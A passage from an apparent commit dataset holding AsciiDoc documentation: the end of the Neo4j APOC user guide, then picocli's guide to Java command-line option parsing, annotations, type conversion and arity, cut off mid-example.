Integration\n\ninclude::loadjson.adoc[leveloffset=2]\ninclude::loadjdbc.adoc[leveloffset=2]\ninclude::loadcsv.adoc[leveloffset=2]\ninclude::gephi.adoc[leveloffset=2]\ninclude::elasticsearch.adoc[leveloffset=2]\ninclude::loadxml.adoc[leveloffset=2]\ninclude::loadhtml.adoc[leveloffset=2]\n\n== Graph Refactorings\n\ninclude::refactor.adoc[leveloffset=2]\n\n== Cypher Operations\n\ninclude::cypher.adoc[leveloffset=2]\ninclude::periodic.adoc[leveloffset=2]\n\n++++\n<link rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/cdn.datatables.net\/1.10.13\/css\/jquery.dataTables.min.css\">\n<script src=\"https:\/\/code.jquery.com\/jquery-1.12.4.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.13\/js\/jquery.dataTables.min.js\"><\/script>\n<script>\n$(document).ready(function() {\n $('#table-all').DataTable();\n} );\n<\/script>\n++++\n\n== Virtual\n\ninclude::create-virtual-nodes-rels.adoc[leveloffset=1]\n\ninclude::virtual-graph.adoc[leveloffset=1]\n\ninclude::grouping.adoc[leveloffset=1]\n\n== Graph Refactoring\n\ninclude::graph-refactor.adoc[leveloffset=1]\n\n== Triggers\n\ninclude::trigger.adoc[leveloffset=2]\n\n== Schema\n\ninclude::schema.adoc[leveloffset=2]\n\n== Atomic\n\ninclude::atomic.adoc[leveloffset=1]\n\n== Bolt\n\ninclude::bolt.adoc[leveloffset=1]\n\n== Appendix: Complete Overview\n\ninclude::overview.adoc[tags=overview,leveloffset=1]\n\n== Performance Tests\n\ninclude::big-graph-from-cypher.adoc[leveloffset=1]\n\ninclude::graphml-tests.adoc[leveloffset=1]\n","old_contents":"= APOC User Guide {apoc-release}\n:toc: left\n:experimental:\n:sectid:\n:sectlinks:\n:toclevels: 3\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/img\n:script: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/script\n\n== Introduction\n\nNOTE: Go here for documentation for APOC for Neo4j version link:index30.html[3.0.x] link:index31.html[3.1.x] link:index32.html[3.2.x] link:index33.html[3.3.x]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=intro,leveloffset=1]\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/b1Yr2nHNS4M\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\n\ninclude::..\/readme.adoc[tags=signature,leveloffset=1]\n\n== Help and Usage\n\ninclude::overview.adoc[tags=help,leveloffset=-1]\n\nTo generate the help output, apoc utilizes the built-in `dbms.procedures()` and `dbms.functions()` utilities.\n\n== Overview of 
APOC Procedures & Functions\n\n[[table-all]]\n[separator=\u00a6,opts=header]\n|===\ninclude::..\/build\/generated-documentation\/documentation.csv[]\n|===\n\ninclude::functions.adoc[leveloffset=+1]\n\ninclude::..\/readme.adoc[tags=install,leveloffset=1]\n\n=== Notices\n\ninclude::..\/readme.adoc[tags=warnings,leveloffset=1]\n\ninclude::..\/readme.adoc[tags=docker,leveloffset=1]\n\n\n\/\/ include::overview.adoc[tags=overview,leveloffset=1]\n\n== Text and Lookup Indexes\n\n=== Index Queries\n\nProcedures to add to and query manual indexes\n\nNOTE: Please note that there are (case-sensitive) http:\/\/neo4j.com\/docs\/developer-manual\/current\/#cypher-schema[automatic schema indexes], for equality, non-equality, existence, range queries, starts with, ends-with and contains!\n\n[separator=\u00a6,opts=header,cols=\"1,1m,5\"]\n|===\ninclude::..\/build\/generated-documentation\/apoc.index.csv[]\n|===\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| apoc.index.addAllNodes('index-name',{label1:['prop1',...],...}, {options}) | add all nodes to this full text index with the given fields, additionally populates a 'search' index field with all of them in one place\n| apoc.index.addNode(node,['prop1',...]) | add node to an index for each label it has\n| apoc.index.addNodeByLabel('Label',node,['prop1',...]) | add node to an index for the given label\n| apoc.index.addNodeByName('name',node,['prop1',...]) | add node to an index for the given name\n| apoc.index.addRelationship(rel,['prop1',...]) | add relationship to an index for its type\n| apoc.index.addRelationshipByName('name',rel,['prop1',...]) | add relationship to an index for the given name\n| apoc.index.removeNodeByName('name',node) remove node from an index for the given name\n| apoc.index.removeRelationshipByName('name',rel) remove relationship from an index for the given name\n|===\n\/\/\/\/\n\nimage::{img}\/apoc.index.nodes-with-score.jpg[width=600]\n\n\/\/\/\/\n\n[cols=\"1m,5\"]\n|===\n| apoc.index.search('index-name', 'query') YIELD node, weight | search for the first 100 nodes in the given full text index matching the given lucene query returned by relevance\n| apoc.index.nodes('Label','prop:value*') YIELD node, weight | lucene query on node index with the given label name\n| apoc.index.relationships('TYPE','prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name\n| apoc.index.between(node1,'TYPE',node2,'prop:value*') YIELD rel, weight | lucene query on relationship index with the given type name bound by either or both sides (each node parameter can be null)\n| apoc.index.out(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *outgoing* relationship of the given node, *returns end-nodes*\n| apoc.index.in(node,'TYPE','prop:value*') YIELD node, weight | lucene query on relationship index with the given type name for *incoming* relationship of the given node, *returns start-nodes*\n|===\n\/\/\/\/\n\n=== Index Management\n\n\/\/\/\/\n[cols=\"1m,5\"]\n|===\n| CALL apoc.index.list() YIELD type,name,config | lists all manual indexes\n| CALL apoc.index.remove('name') YIELD type,name,config | removes manual indexes\n| CALL apoc.index.forNodes('name',{config}) YIELD type,name,config | gets or creates manual node index\n| CALL apoc.index.forRelationships('name',{config}) YIELD type,name,config | gets or creates manual relationship index\n|===\n\/\/\/\/\n\n.Add node to index example\n[source,cypher]\n----\nmatch (p:Person) call 
apoc.index.addNode(p,[\"name\",\"age\"]) RETURN count(*);\n\/\/ 129s for 1M People\ncall apoc.index.nodes('Person','name:name100*') YIELD node, weight return * limit 2\n----\n\n\/\/ include::overview.adoc[tags=fulltext]\n\ninclude::manual-indexes.adoc[leveloffset=2]\n\ninclude::fulltext.adoc[leveloffset=2]\n\n== Utility Functions\n\ninclude::phonetic.adoc[leveloffset=2]\ninclude::extract.adoc[leveloffset=2]\n\ninclude::ttl.adoc[leveloffset=2]\n\ninclude::datetime.adoc[leveloffset=2]\n\ninclude::number.adoc[leveloffset=2]\n\ninclude::exact.adoc[leveloffset=2]\n\ninclude::diff.adoc[leveloffset=2]\n\n== Graph Algorithms\n\ninclude::algo.adoc[leveloffset=2]\ninclude::expand.adoc[leveloffset=2]\ninclude::centrality.adoc[leveloffset=2]\ninclude::pagerank.adoc[leveloffset=2]\n\n== Spatial\n\ninclude::spatial.adoc[leveloffset=2]\n\n== Data Integration\n\ninclude::loadjson.adoc[leveloffset=2]\ninclude::loadjdbc.adoc[leveloffset=2]\ninclude::loadcsv.adoc[leveloffset=2]\ninclude::gephi.adoc[leveloffset=2]\ninclude::elasticsearch.adoc[leveloffset=2]\ninclude::loadxml.adoc[leveloffset=2]\ninclude::loadhtml.adoc[leveloffset=2]\n\n== Graph Refactorings\n\ninclude::refactor.adoc[leveloffset=2]\n\n== Cypher Operations\n\ninclude::cypher.adoc[leveloffset=2]\ninclude::periodic.adoc[leveloffset=2]\n\n++++\n<link rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/cdn.datatables.net\/1.10.13\/css\/jquery.dataTables.min.css\">\n<script src=\"https:\/\/code.jquery.com\/jquery-1.12.4.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.13\/js\/jquery.dataTables.min.js\"><\/script>\n<script>\n$(document).ready(function() {\n $('#table-all').DataTable();\n} );\n<\/script>\n++++\n\n== Virtual\n\ninclude::create-virtual-nodes-rels.adoc[leveloffset=1]\n\ninclude::virtual-graph.adoc[leveloffset=1]\n\ninclude::grouping.adoc[leveloffset=1]\n\n== Graph Refactoring\n\ninclude::graph-refactor.adoc[leveloffset=1]\n\n== Triggers\n\ninclude::trigger.adoc[leveloffset=2]\n\n== Schema\n\ninclude::schema.adoc[leveloffset=2]\n\n== Atomic\n\ninclude::atomic.adoc[leveloffset=1]\n\n== Bolt\n\ninclude::bolt.adoc[leveloffset=1]\n\n== Appendix: Complete Overview\n\ninclude::overview.adoc[tags=overview,leveloffset=1]\n\n== Performance Tests\n\ninclude::big-graph-from-cypher.adoc[leveloffset=1]\n\ninclude::graphml-tests.adoc[leveloffset=1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52bfc4cf4a92ad8f2e9c6e04b9c3f44e3d7059dd","subject":"simplified sample code","message":"simplified sample code\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"= picocli - a mighty tiny Command Line Interface\nRemko Popma <rpopma@apache.org>\nv0.3.0, 2017-03-25\n:toc: left\n:numbered:\n:toclevels: 2\n:toc-title: Features\n\nA Java command line parsing framework in a single file, so you can include it _in source form_\nand let users run your application without an external dependency.\nProduces clean and easily tailored usage help messages.\n\nHow it works: annotate your class and picocli initializes it from the command line arguments,\nconverting the input to strongly typed values in the fields of your class.\n\n== Example\n\n[source,java]\n----\nimport picocli.CommandLine.Option;\nimport picocli.CommandLine.Parameters;\nimport java.io.File;\n\npublic class Example {\n @Option(names = { \"-v\", \"--verbose\" }, description = \"Be verbose.\")\n private boolean verbose = false;\n\n @Option(names = { 
\"-h\", \"--help\" }, help = true,\n description = \"Displays this help message and quits.\")\n private boolean helpRequested = false;\n\n @Parameters(arity = \"1..*\", paramLabel = \"FILE\", description = \"File(s) to process.\")\n private File[] inputFiles;\n ...\n}\n----\n\nThen invoke `CommandLine.parse` with the command line parameters and an object you want to initialize.\n\n[source,java]\n----\nString[] args = { \"-v\", \"inputFile1\", \"inputFile2\" };\nExample app = CommandLine.parse(new Example(), args);\nassert !app.helpRequested;\nassert app.verbose;\nassert app.inputFiles != null && app.inputFiles.length == 2;\n----\n\n== Options and Parameters\nCommand line arguments can be separated into _options_ (sometimes called _flags_ or _switches_), and _parameters_ (sometimes called _positional parameters_ or _operands_).\nOptions have a name, parameters are the values that follow the options.\n\n[source]\n----\n<command> -cvf=file1.txt --out result.txt abc def 123 45.6\n | | | | | | | |\n | | | | +---+---+---+--- positional parameters\n | | | |\n | | | +--- option-parameter for \"--out\"\n | | |\n | | +--- option\n | |\n | +--- option-parameter for \"-f\"\n |\n +--- clustered options \"-c\", \"-v\", and \"-f\"\n----\nPicocli has separate annotations for options and positional parameters because they work slightly differently.\n\n.Best Practices\n[TIP]\nThe https:\/\/www.gnu.org\/prep\/standards\/html_node\/Command_002dLine-Interfaces.html#Command_002dLine-Interfaces[GNU recommendations] for command line interfaces and http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX Utility Guidelines] may be useful. Generally, many applications use options for optional values and parameters for mandatory values.\nHowever, picocli lets you make options required if you want to, see <<Required Options>>.\n\n=== Options\nAn option must have one or more `names`. Option names usually have a prefix to distinguish them from parameters. Different operating systems and applications use https:\/\/en.wikipedia.org\/wiki\/Command-line_interface#Command-line_option[different prefixing] styles. Picocli lets you use any option name you want.\n\nTIP: You may be interested in this http:\/\/catb.org\/~esr\/writings\/taoup\/html\/ch10s05.html#id2948149[list of common option names]. 
Following these conventions may make your application more intuitive to use.\n\nThe below example shows options with one or more names, options that take an option parameter, and \"help\" options.\n[source,java]\n----\nclass Tar {\n @Option(names = { \"-c\", \"--create\" }, description = \"create a new archive\")\n boolean create;\n\n @Option(names = \"-x\", description = \"extract files from an archive\")\n boolean extract;\n\n @Option(names = { \"-f\", \"--file\" }, paramLabel = \"ARCHIVE\",\n description = \"use archive file or device ARCHIVE\")\n File archive;\n\n @Parameters(paramLabel = \"FILE\", description = \"one or more files to archive\")\n File[] files;\n}\n----\nPicocli matches the option names to set the field values.\n[source,java]\n----\nString[] args = { \"-cf\", \"result.tar\", \"file1.txt\", \"file2.txt\" };\nTar tar = CommandLine.parse(new Tar(), args);\nassert tar.create;\nassert !tar.extract;\nassert tar.archive.equals(new File(\"result.tar\"));\nassert Arrays.equals(tar.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\n----\n\nPicocli supports http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX clustered short options]:\nOne or more options without option-arguments, followed by at most one option that takes an option-argument, should be accepted when grouped behind one '-' delimiter.\n\n\nFor example, given this annotated class:\n[source,java]\n----\nclass ClusteredShortOptions {\n @Option(names = \"-a\") boolean a;\n @Option(names = \"-b\") boolean b;\n @Option(names = \"-c\") boolean c;\n @Option(names = \"-f\") String f;\n}\n----\nThe following command line arguments are all equivalent and parsing them will give the same result:\n\n[source,java]\n----\n<command> -abcfInputFile.txt\n<command> -a -b -c -fInputFile.txt\n<command> -a -b -c -f InputFile.txt\n<command> -a -b -c -f=InputFile.txt\n<command> -abc -f=InputFile.txt\n<command> -ab -cf=InputFile.txt\n...\n----\n\n\n=== Positional Parameters\nPositional parameters (also called operands) are the command line arguments following the options.\n\nUse the (zero-based) `index` attribute to specify exactly which parameters to capture. Omitting the `index` attribute means the field is initialized with all positional parameters (so the field should be a multi-value type like an array or a collection).\n\nThe `index` attribute accepts \"range\" values, so an annotation like `@Parameters(index=\"2..4\")` captures arguments at index 2, 3 and 4. Range values can be open-ended. For example, `@Parameters(index=\"3..*\")` captures all arguments from index 3 and up.\n\nThe advantage of capturing individual parameters in separate fields is that you can enforce strong typing. 
For example:\n\n[source,java]\n----\nclass PositionalParameters {\n @Parameters(hidden = true) \/\/ \"hidden\": don't show this parameter in usage help message\n List<String> allParameters; \/\/ no \"index\" attribute: captures _all_ arguments (as Strings)\n\n @Parameters(index = \"0\", \/\/ index=0: the first positional parameter\n description = \"Host name or IP address to connect to\")\n InetAddress host;\n\n @Parameters(index = \"1\", \/\/ index=1: the second positional parameter\n description = \"Port number to connect to\")\n int port;\n\n @Parameters(index = \"2..*\", description = \"the files to process\")\n File[] files;\n}\n----\n\nPicocli initializes fields with the values at the specified index in the arguments array.\n[source,java]\n----\nString[] args = { \"localhost\", \"12345\", \"file1.txt\", \"file2.txt\" };\nPositionalParameters params = CommandLine.parse(new PositionalParameters(), args);\nassert params.host.getHostName().equals(\"localhost\");\nassert params.port == 12345;\nassert Arrays.equals(params.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\nassert params.allParameters.equals(Arrays.asList(\"localhost\", \"12345\", \"file1.txt\", \"file2.txt\"));\n----\n\nSee <<Type Conversion>> for which types are supported out of the box and how to add custom types.\n\n=== Double dash (`--`)\nWhen one of the command line arguments is two dashes without any characters attached (`--`), picocli interprets all following arguments as positional parameters, even arguments that match an option name.\n\n[source,java]\n----\nclass DoubleDash {\n @Parameters\n List<String> params;\n\n @Option(names = \"--files\")\n List<String> files;\n\n @Option(names = { \"-v\", \"--verbose\" })\n boolean verbose;\n}\n----\n\nThe `--` clarifies which of the arguments are positional parameters:\n[source,java]\n----\nString[] args = { \"-v\", \"--\", \"--files\", \"file1\", \"file2\" };\nDoubleDash doubleDash = CommandLine.parse(new DoubleDash(), args);\n\nassert doubleDash.verbose;\nassert doubleDash.files == null;\nassert doubleDash.params != null && doubleDash.params.size() == 3;\nassert doubleDash.params.equals(Arrays.asList(\"--files\", \"file1\", \"file2\"));\n----\n\n=== Option-Parameter Separators\n==== Default Separators\nOptions may take an _option parameter_ (also called _option-argument_).\nFor POSIX-style short options (like `-f` or `-c`), the option parameter may be attached to the option,\nor it may be separated by a space or the _separator string_ (`=` by default).\nThat is, all of the below are equivalent:\n[source,java]\n----\n<command> -foutput.txt\n<command> -f output.txt\n<command> -f=output.txt\n----\n\nLong option names (like `--file`) must be separated from their option parameter by a space or the\n_separator string_ (`=` by default). 
Long option names (like `--file`) must be separated from their option parameter by a space or the\n_separator string_ (`=` by default). That is, the first two examples below are valid but the last example is invalid:\n----\n\/\/ valid\n<command> --file output.txt\n<command> --file=output.txt\n\n\/\/ invalid (picocli will not recognize the --file option)\n<command> --fileoutput.txt\n----\n\n==== Custom Separators\nThe separator string can be customized programmatically or declaratively.\n\nUse the `separator` attribute of the `@Command` annotation to declaratively set a separator string:\n[source,java]\n----\n@Command(separator = \":\") \/\/ declaratively set a separator\nclass OptionArg {\n @Option(names = { \"-f\", \"--file\" }) String file;\n}\n----\n[source,java]\n----\nOptionArg optionArg = CommandLine.parse(new OptionArg(), \"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\nAlternatively, the separator string can be changed programmatically with the `CommandLine.setSeparator(String separator)` method.\nFor example:\n[source,java]\n----\nOptionArg optionArg = new OptionArg();\nCommandLine commandLine = new CommandLine(optionArg);\n\ncommandLine.setSeparator(\":\"); \/\/ programmatically set a separator\ncommandLine.parse(\"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\n\n== Type Conversion\nWhen command line options and parameters are mapped to the annotated fields,\nthe text value is converted to the type of the annotated field.\n\n=== Built-in Type Converters\nOut of the box, picocli can convert command line argument strings to any Java primitive type or its wrapper,\nFile, BigDecimal, BigInteger, InetAddress, URL, URI, Charset, UUID, regex Pattern, String, StringBuilder, CharSequence,\n`java.sql.Time` (for values in any of the `\"HH:mm\"`, `\"HH:mm:ss\"`, `\"HH:mm:ss.SSS\"`, or `\"HH:mm:ss,SSS\"` formats), and\n`java.util.Date` (for values in `\"yyyy-MM-dd\"` format).\n\n=== Custom Type Converters\nRegister a custom converter to handle data types other than the above built-in ones.\n\nCustom converters need to implement the `picocli.CommandLine.ITypeConverter` interface:\n\n[source,java]\n----\npublic interface ITypeConverter<K> {\n \/**\n * Converts the specified command line argument value to some domain object.\n * @param value the command line argument String value\n * @return the resulting domain object\n * @throws Exception an exception detailing what went wrong during the conversion\n *\/\n K convert(String value) throws Exception;\n}\n----\n\nCustom type converters can be registered with the `CommandLine.registerConverter(Class<K> cls, ITypeConverter<K> converter)`\nmethod.\n\n\nNOTE: Picocli works with Java 5 and higher, so it does not have default converters for Java 8 types like `Path` or\n`Duration`. Lambdas make it easy to register custom converters for these types:\n\n[source,java]\n----\ncommandLine.registerConverter(java.nio.file.Path.class, s -> java.nio.file.Paths.get(s));\ncommandLine.registerConverter(java.time.Duration.class, s -> java.time.Duration.parse(s));\n----\n\nAfter registering custom converters, call the `parse(String...)` method on the `CommandLine` instance where the converters are registered. The static `parse` method cannot be used. 
For example:\n\n[source,java]\n----\nclass App {\n @Parameters Path path;\n @Option(names = \"-d\") Duration duration;\n}\n----\n\n[source,java]\n----\nApp app = new App();\nCommandLine commandLine = new CommandLine(app);\ncommandLine.registerConverter(Path.class, s -> Paths.get(s));\ncommandLine.registerConverter(Duration.class, s -> Duration.parse(s));\n\ncommandLine.parse(\"-d\", \"PT15M\", \"file1.txt\");\nassert app.path.equals(Paths.get(\"file1.txt\"));\nassert app.duration.equals(Duration.parse(\"PT15M\"));\n----\n\n=== Arrays and Collections\n\nIMPORTANT: With array fields, picocli uses reflection to discover the array element type, but with collections, Java type erasure means picocli cannot find out the generic type of the collection. For non-String collections, use the `type` attribute to explicitly tell picocli what type to convert the command line arguments to.\n\nMultiple parameters can be captured together in a single array or `Collection` field. When using a collection, use the `type` attribute to specify the collection element type. For example:\n\n[source,java]\n----\nclass Convert {\n @Option(type = java.util.regex.Pattern.class, \/\/ List elements are Pattern objects\n names = \"-patterns\",\n description = \"the regular expressions to use for the conversion\")\n List<Pattern> patterns;\n\n @Parameters(type = File.class, \/\/ convert arguments to File before adding to the List\n description = \"files to convert\")\n List<File> files;\n}\n----\n\n[source,java]\n----\nString[] args = { \"-patterns\", \"a*b\", \"[a-e][i-u]\", \"--\", \"file1.txt\", \"file2.txt\" };\nConvert convert = CommandLine.parse(new Convert(), args);\n\n\/\/ convert.patterns now has two Pattern objects\n\/\/ convert.files now has two File objects\n----\n\nNOTE: If a collection is returned from a type converter, picocli will add the values to the field, not the collection itself.\n\n
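The two comments in the `Convert` example could be written as assertions (a sketch, assuming the same `args` as above):\n[source,java]\n----\nassert convert.patterns.size() == 2;\nassert convert.patterns.get(1).pattern().equals(\"[a-e][i-u]\");\nassert convert.files.equals(Arrays.asList(new File(\"file1.txt\"), new File(\"file2.txt\")));\n----\n\n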
=== Numeric Arguments\nNumeric values are interpreted as decimal numbers by default. If you want picocli to be more flexible, you can\nregister a custom type converter that delegates to the https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Integer.html#decode-java.lang.String-[decode] method to convert strings to numbers.\n\nNOTE: The `decode` method looks at the prefix to determine the radix, so numbers\nstarting with `0x`, `0X` or `#` are interpreted as hexadecimal numbers, numbers starting with `0` are interpreted\nas octal numbers, and otherwise the number is interpreted as a decimal number.\n\nJava 8-style lambdas:\n[source,java]\n----\ncommandLine.registerConverter(Byte.class, s -> Byte.decode(s));\ncommandLine.registerConverter(Byte.TYPE, s -> Byte.decode(s));\ncommandLine.registerConverter(Short.class, s -> Short.decode(s));\ncommandLine.registerConverter(Short.TYPE, s -> Short.decode(s));\ncommandLine.registerConverter(Integer.class, s -> Integer.decode(s));\ncommandLine.registerConverter(Integer.TYPE, s -> Integer.decode(s));\ncommandLine.registerConverter(Long.class, s -> Long.decode(s));\ncommandLine.registerConverter(Long.TYPE, s -> Long.decode(s));\n----\n\nIn Java 5 this becomes a bit more verbose:\n[source,java]\n----\nITypeConverter<Integer> intConverter = new ITypeConverter<Integer>() {\n public Integer convert(String s) {\n return Integer.decode(s);\n }\n};\ncommandLine.registerConverter(Integer.class, intConverter);\ncommandLine.registerConverter(Integer.TYPE, intConverter);\n...\n----\n\n
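With a `decode`-based converter registered, a command can accept hexadecimal or octal input. A minimal sketch (the `Port` class and its `-p` option are illustrative assumptions, reusing the `intConverter` above):\n[source,java]\n----\nclass Port {\n @Option(names = \"-p\") int port;\n}\n\nPort p = new Port();\nCommandLine cmd = new CommandLine(p);\ncmd.registerConverter(Integer.TYPE, intConverter); \/\/ converter for primitive int fields\ncmd.parse(\"-p\", \"0x1F\");\nassert p.port == 31; \/\/ \"0x1F\" was decoded as a hexadecimal number\n----\n\n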
\n== Arity\nArity is the number of parameters that will be consumed by an option.\nMost of the time picocli will consume the right number of parameters automatically and you don't need to worry about this.\n\nWhen an option or parameters field has a type that can hold multiple values (an array or a collection),\nthe `arity` attribute lets you control exactly how many parameters are captured by this field.\n\n=== Default Arity\nThe default arity value of a field annotated with `@Option` or `@Parameters` depends on the field's type.\n\n* Boolean fields: arity is zero (no parameter is consumed - the field is set to `true` when the option name is recognized).\n* Single-valued types like `int`, `String`, `File`: arity is one (consume one parameter). Omitting the option parameter results in a `ParameterException`: \"Missing required parameter for field '<field-name>'\".\n* Multi-valued types like arrays or collections: consume from zero up to all available parameters.\n\n\n=== Boolean Options with Explicit Parameters\nIt is possible to explicitly specify \"true\" or \"false\" as a parameter for a boolean option by defining an explicit <<Arity,`arity`>> attribute. A boolean option with `arity = \"0..1\"` accepts zero to one parameters, `arity = \"1\"` means the option _must_ have one parameter. For example:\n\n[source, java]\n----\nclass BooleanOptionWithParameters {\n @Option(names = \"-x\", arity = \"1\", description = \"1 mandatory parameter\")\n boolean x;\n\n @Option(names = \"-y\", arity = \"0..1\", description = \"min 0 and max 1 parameter\")\n boolean y;\n}\n----\n\nThe following ways to invoke the program will be accepted (values are not case sensitive):\n----\n<command> -x true\n<command> -x FALSE\n<command> -x TRUE -y\n<command> -x True -y False\n----\n\nBut trying to specify the `-x` option without a parameter, or with a value other than \"true\" or \"false\" (case insensitive), will result in a `ParameterException`.\n\n=== Arrays and Collections\nOption fields of type array or `List` (or any class extending `Collection`) will be able to hold multiple values.\nBy default, picocli will capture arguments into these fields until it encounters a command line argument that is\nan option name or a registered command name.\n\nThe `arity` attribute can be used to specify the exact number of required parameters, or a range with a minimum and a maximum number of parameters. The maximum can be a fixed number, or can be `\"*\"` to denote \"any number\" of parameters. For example:\n[source, java]\n----\nclass MyProgram {\n @Parameters(arity = \"3\", description = \"exactly three Files\")\n File[] files;\n\n @Option(names = \"-f\", arity = \"2..4\", description = \"two to four floating point numbers\")\n double[] doubles;\n\n @Option(names = \"-s\", arity = \"1..*\", description = \"at least one string\")\n String[] strings;\n}\n----\nA `MissingParameterException` is thrown when fewer than the minimum number of required parameters is specified as command line arguments. Options with an exact number or a range will consume up to the maximum number of parameters.\n\nOnce the minimum number of parameters is consumed, picocli will check for each subsequent command line argument whether it is another parameter, or a new option. For example:\n\n----\n<command> -s A B C -f 1.0 2.0 3.0\n----\nThe above command line arguments will be parsed as three parameters for the `-s` option, followed by three parameters for the `-f` option.\n\n=== Ambiguous Input\nPositional parameters do not have an option name, so it is not always easy to decide where they start. The below example command line arguments will be parsed as six parameters for the `-s` option, not as three strings and three files:\n----\n<command> -s A B C file1 file2 file3\n----\n\nUsers can disambiguate the input by specifying a double dash (`--`) after the option parameters.\nThe argument `--` is interpreted as a delimiter indicating the end of options. Any following arguments are treated as positional parameters. For example, the following command line arguments will be parsed as three strings and three files:\n----\n<command> -s A B C -- file1 file2 file3\n----\n\n=== Option-Parameter Separators and Arity\n\nIMPORTANT: A separator clarifies that a parameter belongs to an option, but does not prevent subsequent parameters from also being assigned to the same option. For example:\n\n[source,java]\n----\n@Option(names = \"-opt\", arity = \"2\") List<String> values;\n@Parameters List<String> remainder;\n----\nBecause arity is 2, both parameters in the below example are assigned to the `-opt` option:\n----\n<command> -opt=val1 val2\n----\n\n
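A sketch of this behavior in code (the `SeparatorArity` class wrapping the two fields above is an illustrative assumption):\n[source,java]\n----\nclass SeparatorArity {\n @Option(names = \"-opt\", arity = \"2\") List<String> values;\n @Parameters List<String> remainder;\n}\n\nSeparatorArity sa = CommandLine.parse(new SeparatorArity(), \"-opt=val1\", \"val2\");\nassert sa.values.equals(Arrays.asList(\"val1\", \"val2\"));\nassert sa.remainder == null; \/\/ nothing was left over for the positional parameters\n----\n\n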
\n\n== Required Options\n=== Options\nOptions can be marked `required` to make it mandatory for the user to specify them on the command line. When a required option is not specified, a `MissingParameterException` is thrown from the `parse` method. For example:\n[source, java]\n----\nclass MandatoryOption {\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n\n @Parameters\n File[] files;\n}\n----\nThe following command line arguments would result in an exception complaining that `number` is missing:\n----\n\/\/ invalid: missing option -n\n<command> file1 file2 file3\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: required option -n has a value\n<command> -n 123 file1 file2 file3\n----\n\n=== Parameters\nUse the `arity` attribute to make `@Parameters` mandatory:\n[source, java]\n----\nclass BothOptionAndParametersMandatory {\n @Parameters(arity = \"1..*\", description = \"at least one File\")\n File[] files;\n\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n}\n----\nThe following command line arguments would result in an exception complaining that `files` are missing:\n----\n\/\/ invalid: missing file parameters\n<command> -n 123\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: both required fields have a value\n<command> -n 123 file1\n----\n\n\n\n== Help Options\nOptions with the attribute `help = true` are special: if one of the command line arguments is a \"help\" option, picocli will stop parsing the remaining arguments and will not check for required options.\n\n[source,java]\n----\n@Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\nboolean helpRequested;\n----\nThis is suitable for options that should trigger display of the usage help message or the application version information on the console.\n\nIt is the responsibility of the application to check the field and show the usage help message:\n[source,java]\n----\nApp app = CommandLine.parse(new App(), args);\nif (app.helpRequested) {\n CommandLine.usage(new App(), System.err);\n return;\n}\n----\n\n== Usage Help\n=== Example\nA default picocli usage help message looks like this:\n----\nUsage: cat [-AbeEnstTuv] [--help] [--version] [FILE...]\nConcatenate FILE(s), or standard input, to standard output.\n FILE Files whose contents to display\n -A, --show-all equivalent to -vET\n -b, --number-nonblank number nonempty output lines, overrides -n\n -e equivalent to -vET\n -E, --show-ends display $ at end of each line\n -n, --number number all output lines\n -s, --squeeze-blank suppress repeated empty output lines\n -t equivalent to -vT\n -T, --show-tabs display TAB characters as ^I\n -u (ignored)\n -v, --show-nonprinting use ^ and M- notation, except for LFD and TAB\n --help display this help and exit\n --version output version information and exit\nCopyright(c) 2017\n----\n\nThe usage help message is generated from annotation attributes, like below:\n[source,java]\n----\n@Command(name = \"cat\", footer = \"Copyright(c) 2017\",\n description = \"Concatenate FILE(s), or standard input, to standard output.\")\nclass Cat {\n\n @Parameters(paramLabel = \"FILE\", description = \"Files whose contents to display\")\n List<File> files;\n\n @Option(names = \"--help\", help = true, description = \"display this help and exit\")\n boolean help;\n\n @Option(names = \"-t\", description = \"equivalent to -vT\") boolean t;\n @Option(names = \"-e\", description = \"equivalent to -vET\") boolean e;\n @Option(names = {\"-A\", \"--show-all\"}, description = \"equivalent to -vET\") boolean all;\n\n 
